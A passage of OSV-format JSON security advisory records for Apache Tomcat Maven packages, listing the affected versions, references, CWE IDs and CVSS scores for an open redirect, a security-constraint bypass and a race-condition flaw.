"9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85", "9.0.86", "9.0.87", "9.0.88", "9.0.89", "9.0.90", "9.0.91", "9.0.93", "9.0.94", "9.0.95", "9.0.96", "9.0.97" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/12/GHSA-5j33-cvvr-w245/GHSA-5j33-cvvr-w245.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "last_affected": "8.5.100" } ] } ], "versions": [ "8.5.0", "8.5.100", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", 
"8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.8", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.9", "8.5.90", "8.5.91", "8.5.92", "8.5.93", "8.5.94", "8.5.95", "8.5.96", "8.5.97", "8.5.98", "8.5.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/12/GHSA-5j33-cvvr-w245/GHSA-5j33-cvvr-w245.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "last_affected": "8.5.100" } ] } ], "versions": [ "8.5.0", "8.5.100", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.8", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.9", "8.5.90", "8.5.91", "8.5.92", "8.5.93", "8.5.94", "8.5.95", 
"8.5.96", "8.5.97", "8.5.98", "8.5.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/12/GHSA-5j33-cvvr-w245/GHSA-5j33-cvvr-w245.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-50379" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/05ddeeaa54df1e2dc427d0164bedd6b79f78d81f" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/43b507ebac9d268b1ea3d908e296cc6e46795c00" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/631500b0c9b2a2a2abb707e3de2e10a5936e5d41" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/684247ae85fa633b9197b32391de59fc54703842" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/8554f6b1722b33a2ce8b0a3fad37825f3a75f2d2" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/cc7a98b57c6dc1df21979fcff94a36e068f4456c" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread/y6lj6q1xnp822g6ro70tn19sgtjmr80r" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00009.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20250103-0003" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-10.html#Fixed_in_Apache_Tomcat_10.1.34" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-11.html#Fixed_in_Apache_Tomcat_11.0.2" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-9.html#Fixed_in_Apache_Tomcat_9.0.98" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2024/12/17/4" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2024/12/18/2" } ], "database_specific": { "cwe_ids": [ "CWE-367" ], "github_reviewed": true, "github_reviewed_at": "2024-12-17T16:39:38Z", "nvd_published_at": "2024-12-17T13:15:18Z", "severity": "HIGH" }, "severity": [ { 
"type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U" } ] }, { "schema_version": "1.7.3", "id": "GHSA-5q99-f34m-67gc", "published": "2018-10-17T16:31:02Z", "modified": "2024-03-11T05:31:33.810503Z", "aliases": [ "CVE-2018-11784" ], "summary": "Apache Tomcat Open Redirect vulnerability", "details": "When the default servlet in Apache Tomcat versions 9.0.0.M1 to 9.0.11, 8.5.0 to 8.5.33 and 7.0.23 to 7.0.90 returned a redirect to a directory (e.g. redirecting to '/foo/' when the user requested '/foo') a specially crafted URL could be used to cause the redirect to be generated to any URI of the attackers choice.", "affected": [ { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "fixed": "8.5.34" } ] } ], "versions": [ "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.4", "8.5.5", "8.5.6", "8.5.8", "8.5.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-5q99-f34m-67gc/GHSA-5q99-f34m-67gc.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "7.0.23" }, { "fixed": "7.0.91" } ] } ], "versions": [ "7.0.23", "7.0.25", "7.0.26", "7.0.27", "7.0.28", "7.0.29", "7.0.30", "7.0.32", "7.0.33", "7.0.34", "7.0.35", "7.0.37", "7.0.39", "7.0.40", "7.0.41", "7.0.42", "7.0.47", "7.0.50", "7.0.52", "7.0.53", "7.0.54", "7.0.55", "7.0.56", "7.0.57", "7.0.59", "7.0.61", "7.0.62", 
"7.0.63", "7.0.64", "7.0.65", "7.0.67", "7.0.68", "7.0.69", "7.0.70", "7.0.72", "7.0.73", "7.0.75", "7.0.76", "7.0.77", "7.0.78", "7.0.79", "7.0.81", "7.0.82", "7.0.84", "7.0.85", "7.0.86", "7.0.88", "7.0.90" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-5q99-f34m-67gc/GHSA-5q99-f34m-67gc.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0" }, { "fixed": "9.0.12" } ] } ], "versions": [ "9.0.1", "9.0.10", "9.0.11", "9.0.2", "9.0.4", "9.0.5", "9.0.6", "9.0.7", "9.0.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-5q99-f34m-67gc/GHSA-5q99-f34m-67gc.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-11784" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/b76e1dfb3dec3789cc700f8d022c872eb947a221" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/efb860b3ff8ebcf606199b8d0d432f76898040da" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/f9f147359b7c95511b64cd99bbc47917c01b3879" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2018/10/msg00005.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raba0fabaf4d56d4325ab2aca8814f0b30a237ab83d8106b115ee279a@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raba0fabaf4d56d4325ab2aca8814f0b30a237ab83d8106b115ee279a%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9136ff5b13e4f1941360b5a309efee2c114a14855578c3a2cbe5d19c@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r9136ff5b13e4f1941360b5a309efee2c114a14855578c3a2cbe5d19c%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6ccee4e849bc77df0840c7f853f6bd09d426f6741247da2b7429d5d9@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6ccee4e849bc77df0840c7f853f6bd09d426f6741247da2b7429d5d9%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/eb6efa8d59c45a7a9eff94c4b925467d3b3fec8ba7697f3daa314b04@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/eb6efa8d59c45a7a9eff94c4b925467d3b3fec8ba7697f3daa314b04%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:0130" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2018/10/msg00006.html" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BZ4PX4B3QTKRM35VJAVIEOPZAF76RPBP" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BZ4PX4B3QTKRM35VJAVIEOPZAF76RPBP" }, { "type": "WEB", "url": "https://seclists.org/bugtraq/2019/Dec/43" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20181014-0002" }, { 
"type": "WEB", "url": "https://usn.ubuntu.com/3787-1" }, { "type": "WEB", "url": "https://web.archive.org/web/20200227030058/http://www.securityfocus.com/bid/105524" }, { "type": "WEB", "url": "https://www.debian.org/security/2019/dsa-4596" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:0131" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:0485" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1529" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-5q99-f34m-67gc" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=SB10284" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1dd0a59c1295cc08ce4c9e7edae5ad2268acc9ba55adcefa0532e5ba%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1dd0a59c1295cc08ce4c9e7edae5ad2268acc9ba55adcefa0532e5ba@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/23134c9b5a23892a205dc140cdd8c9c0add233600f76b313dda6bd75%40%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/23134c9b5a23892a205dc140cdd8c9c0add233600f76b313dda6bd75@%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/343558d982879bf88ec20dbf707f8c11255f8e219e81d45c4f8d0551%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/343558d982879bf88ec20dbf707f8c11255f8e219e81d45c4f8d0551@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/388a323769f1dff84c9ec905455aa73fbcb20338e3c7eb131457f708%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/388a323769f1dff84c9ec905455aa73fbcb20338e3c7eb131457f708@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3d19773b4cf0377db62d1e9328bf9160bf1819f04f988315086931d7%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3d19773b4cf0377db62d1e9328bf9160bf1819f04f988315086931d7@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5c0e00fd31efc11e147bf99d0f03c00a734447d3b131ab0818644cdb%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5c0e00fd31efc11e147bf99d0f03c00a734447d3b131ab0818644cdb@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6af47120905aa7d8fe12f42e8ff2284fb338ba141d3b77b8c7cb61b3%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6af47120905aa7d8fe12f42e8ff2284fb338ba141d3b77b8c7cb61b3@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/845312a10aabbe2c499fca94003881d2c79fc993d85f34c1f5c77424%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/845312a10aabbe2c499fca94003881d2c79fc993d85f34c1f5c77424@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/88855876c33f2f9c532ffb75bfee570ccf0b17ffa77493745af9a17a%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/88855876c33f2f9c532ffb75bfee570ccf0b17ffa77493745af9a17a@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b5e3f51d28cd5d9b1809f56594f2cf63dcd6a90429e16ea9f83bbedc%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b5e3f51d28cd5d9b1809f56594f2cf63dcd6a90429e16ea9f83bbedc@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e85e83e9954f169bbb77b44baae5a33d8de878df557bb32b7f793661%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e85e83e9954f169bbb77b44baae5a33d8de878df557bb32b7f793661@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00030.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00056.html" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/163456/Apache-Tomcat-9.0.0M1-Open-Redirect.html" } ], "database_specific": { "cwe_ids": [ "CWE-601" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:17:07Z", "nvd_published_at": "2018-10-04T13:29:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-6rxj-58jh-436r", "published": "2018-10-17T16:31:17Z", "modified": "2024-11-29T05:39:06.932138Z", "aliases": [ "CVE-2018-1304" ], "summary": "Apache Tomcat unauthorized access vulnerability", "details": "The URL pattern of \"\" (the empty string) which exactly maps to the context root was not correctly handled in Apache Tomcat 9.0.0.M1 to 9.0.4, 8.5.0 to 8.5.27, 8.0.0.RC1 to 8.0.49 and 7.0.0 to 7.0.84 when used as part of a security constraint definition. This caused the constraint to be ignored. 
It was, therefore, possible for unauthorised users to gain access to web application resources that should have been protected. Only security constraints with a URL pattern of the empty string were affected.", "affected": [ { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0" }, { "fixed": "9.0.5" } ] } ], "versions": [ "9.0.1", "9.0.2", "9.0.4" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.0.4", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-6rxj-58jh-436r/GHSA-6rxj-58jh-436r.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "fixed": "8.5.28" } ] } ], "versions": [ "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.3", "8.5.4", "8.5.5", "8.5.6", "8.5.8", "8.5.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-6rxj-58jh-436r/GHSA-6rxj-58jh-436r.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.0.0" }, { "fixed": "8.0.51" } ] } ], "versions": [ "8.0.1", "8.0.11", "8.0.12", "8.0.14", "8.0.15", "8.0.17", "8.0.18", "8.0.20", "8.0.21", "8.0.22", "8.0.23", "8.0.24", "8.0.26", "8.0.27", "8.0.28", "8.0.29", "8.0.3", "8.0.30", "8.0.32", "8.0.33", "8.0.35", "8.0.36", "8.0.37", "8.0.38", "8.0.39", "8.0.41", "8.0.42", "8.0.43", "8.0.44", "8.0.45", "8.0.46", "8.0.47", "8.0.48", 
"8.0.49", "8.0.5", "8.0.50", "8.0.8", "8.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-6rxj-58jh-436r/GHSA-6rxj-58jh-436r.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "7.0.0" }, { "fixed": "7.0.86" } ] } ], "versions": [ "7.0.0", "7.0.11", "7.0.12", "7.0.14", "7.0.16", "7.0.19", "7.0.2", "7.0.20", "7.0.21", "7.0.22", "7.0.23", "7.0.25", "7.0.26", "7.0.27", "7.0.28", "7.0.29", "7.0.30", "7.0.32", "7.0.33", "7.0.34", "7.0.35", "7.0.37", "7.0.39", "7.0.4", "7.0.40", "7.0.41", "7.0.42", "7.0.47", "7.0.5", "7.0.50", "7.0.52", "7.0.53", "7.0.54", "7.0.55", "7.0.56", "7.0.57", "7.0.59", "7.0.6", "7.0.61", "7.0.62", "7.0.63", "7.0.64", "7.0.65", "7.0.67", "7.0.68", "7.0.69", "7.0.70", "7.0.72", "7.0.73", "7.0.75", "7.0.76", "7.0.77", "7.0.78", "7.0.79", "7.0.8", "7.0.81", "7.0.82", "7.0.84", "7.0.85" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-6rxj-58jh-436r/GHSA-6rxj-58jh-436r.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1304" }, { "type": "WEB", "url": "https://github.com/apache/tomcat80/commit/9e700b93e3bf5c605267d20568a964169f9e0b79" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/723ea6a5bc5e7bc49e5ef84273c3b3c164a6a4fd" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/5af7c13cff7cc8366c5997418e820989fabb8f48" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/2d69fde135302e8cff984bb2131ec69f2e396964" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9136ff5b13e4f1941360b5a309efee2c114a14855578c3a2cbe5d19c%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r6ccee4e849bc77df0840c7f853f6bd09d426f6741247da2b7429d5d9@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6ccee4e849bc77df0840c7f853f6bd09d426f6741247da2b7429d5d9%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/eb6efa8d59c45a7a9eff94c4b925467d3b3fec8ba7697f3daa314b04@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/eb6efa8d59c45a7a9eff94c4b925467d3b3fec8ba7697f3daa314b04%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e85e83e9954f169bbb77b44baae5a33d8de878df557bb32b7f793661@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e85e83e9954f169bbb77b44baae5a33d8de878df557bb32b7f793661%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b5e3f51d28cd5d9b1809f56594f2cf63dcd6a90429e16ea9f83bbedc@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b5e3f51d28cd5d9b1809f56594f2cf63dcd6a90429e16ea9f83bbedc%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b1d7e2425d6fd2cebed40d318f9365b44546077e10949b01b1f8a0fb@%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r9136ff5b13e4f1941360b5a309efee2c114a14855578c3a2cbe5d19c@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raba0fabaf4d56d4325ab2aca8814f0b30a237ab83d8106b115ee279a%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raba0fabaf4d56d4325ab2aca8814f0b30a237ab83d8106b115ee279a@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2018/03/msg00004.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2018/06/msg00008.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2018/07/msg00044.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20180706-0001" }, { "type": "WEB", "url": "https://usn.ubuntu.com/3665-1" }, { "type": "WEB", "url": "https://web.archive.org/web/20200227102806/http://www.securityfocus.com/bid/103170" }, { "type": "WEB", "url": "https://web.archive.org/web/20200516074457/http://www.securitytracker.com/id/1040427" }, { "type": "WEB", "url": "https://www.debian.org/security/2018/dsa-4281" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0465" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0466" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:1320" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:1447" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:1448" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:1449" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:1450" 
}, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:1451" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2939" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2205" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-6rxj-58jh-436r" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1dd0a59c1295cc08ce4c9e7edae5ad2268acc9ba55adcefa0532e5ba%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1dd0a59c1295cc08ce4c9e7edae5ad2268acc9ba55adcefa0532e5ba@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/343558d982879bf88ec20dbf707f8c11255f8e219e81d45c4f8d0551%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/343558d982879bf88ec20dbf707f8c11255f8e219e81d45c4f8d0551@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/388a323769f1dff84c9ec905455aa73fbcb20338e3c7eb131457f708%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/388a323769f1dff84c9ec905455aa73fbcb20338e3c7eb131457f708@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3d19773b4cf0377db62d1e9328bf9160bf1819f04f988315086931d7%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3d19773b4cf0377db62d1e9328bf9160bf1819f04f988315086931d7@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5c0e00fd31efc11e147bf99d0f03c00a734447d3b131ab0818644cdb%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5c0e00fd31efc11e147bf99d0f03c00a734447d3b131ab0818644cdb@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": 
